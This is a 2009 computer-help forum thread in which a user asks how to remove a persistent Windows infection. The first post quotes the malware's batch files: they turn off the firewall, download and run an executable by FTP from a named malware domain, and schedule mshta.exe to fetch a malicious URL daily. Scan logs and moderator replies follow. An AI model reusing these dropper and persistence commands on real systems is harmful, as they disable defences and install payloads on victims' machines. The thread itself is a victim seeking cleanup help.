Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infection FTP's from malware site


  • This topic is locked This topic is locked
5 replies to this topic

#1 grandmasterphat

grandmasterphat

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Local time:03:24 PM

Posted 16 June 2009 - 12:52 AM

Hi,
First post so hi all! I'm having some trouble with a nasty infection I picked up somehow. So far i've run Malwarebytes Anti-Malware and AVG to remove the bulk of the problem. But there's still something there that AVG picks up but can only deal with the symptom, not the cause.

At what looks like scheduled times a batch file is created with a random name like hjBk8WI.bat in c:\. The contents of this file are:
@echo off
netsh firewall set opmode disable
ftp -s:c:\MaJcwy.txt zaebalisuki.com <--- other known malware domains are used as well as this one.
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
exit

Looking at the MaJcwy.txt script that it gets the FTP instructions from it downloads an executable:
qqq
123456
bin
get calc.exe c:\eYVJcEi.exe
bye

Another batch file is created at the same time, again with a random name, but this one contains a schedule to run mshta.exe:
@echo off
sc config Schedule start= auto
net start Schedule
at /delete /yes
at 00:05 /every:M,T,W,Th,F,S,Su mshta.exe http:///woqyymmptn.cn/33t.php
at 00:22 /every:M,T,W,Th,F,S,Su mshta.exe http:///woqyymmptn.cn/33t.php
exit

The batch file is much bigger, this is just the first few lines of it.

When the executable file that was ftp'd in is run AVG picks it up and flags cmd.exe as a possible culprit. I've blocked port 21 to prevent it from making an FTP connection out to get this executable, but none of the scanners I have can pick up the culprit for all of this. Any help much appreciated!

Thanks,
GMP

Edited by garmanma, 16 June 2009 - 07:53 AM.
Disabled links to be on the safe side


BC AdBot (Login to Remove)

 


#2 boopme

boopme

    To Insanity and Beyond


  • Global Moderator
  • 73,490 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:NJ USA
  • Local time:04:24 PM

Posted 16 June 2009 - 08:55 AM

Hello can you post the infected log of Malwarebytes? Maybe we can get an idea of what ran thru here.

The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
How do I get help? Who is helping me?For the time will come when men will not put up with sound doctrine. Instead, to suit their own desires, they will gather around them a great number of teachers to say what their itching ears want to hear....Become a BleepingComputer fan: Facebook

#3 grandmasterphat

grandmasterphat
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Local time:03:24 PM

Posted 16 June 2009 - 11:05 PM

Hi,
Thanks for getting back to me. I've posted two logs here.. one was the original log file and one run just a few minutes ago (with the most up to date database). As you can see, the latest scan detected nothing, however these batch files are still being created, and if I unblock the FTP command port it sneeks out and gets the executable.

Latest scan:

Malwarebytes' Anti-Malware 1.37
Database version: 2291
Windows 5.1.2600 Service Pack 2

17/06/2009 3:59:03 p.m.
mbam-log-2009-06-17 (15-59-03).txt

Scan type: Full Scan (C:\|)
Objects scanned: 233534
Time elapsed: 42 minute(s), 39 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


Older scan:

Malwarebytes' Anti-Malware 1.37
Database version: 2282
Windows 5.1.2600 Service Pack 2

15/06/2009 10:45:35 p.m.
mbam-log-2009-06-15 (22-45-35).txt

Scan type: Full Scan (C:\|)
Objects scanned: 223094
Time elapsed: 28 minute(s), 16 second(s)

Memory Processes Infected: 7
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 5
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 2

Memory Processes Infected:
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\msn (Adware.CashOn) -> Quarantined and deleted successfully.
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\msnhost (Adware.CashOn) -> Quarantined and deleted successfully.
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\msnload (Adware.CashOn) -> Quarantined and deleted successfully.
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\msnconvert (Adware.CashOn) -> Quarantined and deleted successfully.
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\msnmessendger (Adware.CashOn) -> Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
c:\mCT22.exe (Adware.CashOn) -> Delete on reboot.
c:\OGh01p.exe (Adware.CashOn) -> Quarantined and deleted successfully.


AVG picks up the .exe when it tries to run and fixes it, but there's something out there that's still running all this that neither are AVG or MBAM are picking up. The process tab under task manager shows multiple instances of cmd.exe and mshta.exe running, which looks out of place.

Many thanks!

#4 boopme

boopme

    To Insanity and Beyond


  • Global Moderator
  • 73,490 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:NJ USA
  • Local time:04:24 PM

Posted 17 June 2009 - 10:41 AM

Hi those files can be either real or malware. The real file is needed. So we should get the HJT team to dig it out safely.

You need to run HJT/DDS.
Please follow this guide. go and do steps 6 and 7 ,, Preparation Guide For Use Before Using Hijackthis. Then go here HijackThis Logs and Virus/Trojan/Spyware/Malware Removal ,click New Topic,give it a relevant Title and post that complete log.

Let me know if it went OK.
How do I get help? Who is helping me?For the time will come when men will not put up with sound doctrine. Instead, to suit their own desires, they will gather around them a great number of teachers to say what their itching ears want to hear....Become a BleepingComputer fan: Facebook

#5 grandmasterphat

grandmasterphat
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Local time:03:24 PM

Posted 18 June 2009 - 06:55 AM

Thanks for all the help, I will post the logs shortly

#6 Orange Blossom

Orange Blossom

    OBleepin Investigator


  • Moderator
  • 37,011 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:Bloomington, IN
  • Local time:04:24 PM

Posted 19 June 2009 - 10:17 PM

Hello,

Now that you have posted a log here: http://www.bleepingcomputer.com/forums/t/235106/infection-undetectable-ftps-files-from-malware-site/ you should NOT make further changes to your computer (install/uninstall programs, use special fix tools, delete files, edit the registry, etc) unless advised by a HJT Team member, nor should you ask for help elsewhere. Doing so can result in system changes which may not show in the log you already posted. Further, any modifications you make on your own may cause confusion for the helper assisting you and could complicate the malware removal process which would extend the time it takes to clean your computer.

From this point on the HJT Team should be the only members that you take advice from, until they have verified your log as clean.

Please be patient. It may take a while to get a response because the HJT Team members are EXTREMELY busy working logs posted before yours. They are volunteers who will help you out as soon as possible. Once you have made your post and are waiting, please DO NOT make another reply until it has been responded to by a member of the HJT Team. Generally the staff checks the forum for postings that have 0 replies as this makes it easier for them to identify those who have not been helped. If you post another response there will be 1 reply. A team member, looking for a new log to work may assume another HJT Team member is already assisting you and not open the thread to respond. Please be patient. It may take a while to get a response but your log will be reviewed and answered as soon as possible

To avoid confusion, I am closing this topic. Good luck with your log.

Orange Blossom :thumbsup:
Help us help you. If HelpBot replies, you MUST follow step 1 in its reply so we know you need help.

Orange Blossom

An ounce of prevention is worth a pound of cure

SpywareBlaster, WinPatrol Plus, ESET Smart Security, Malwarebytes' Anti-Malware, NoScript Firefox ext., Norton noscript




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users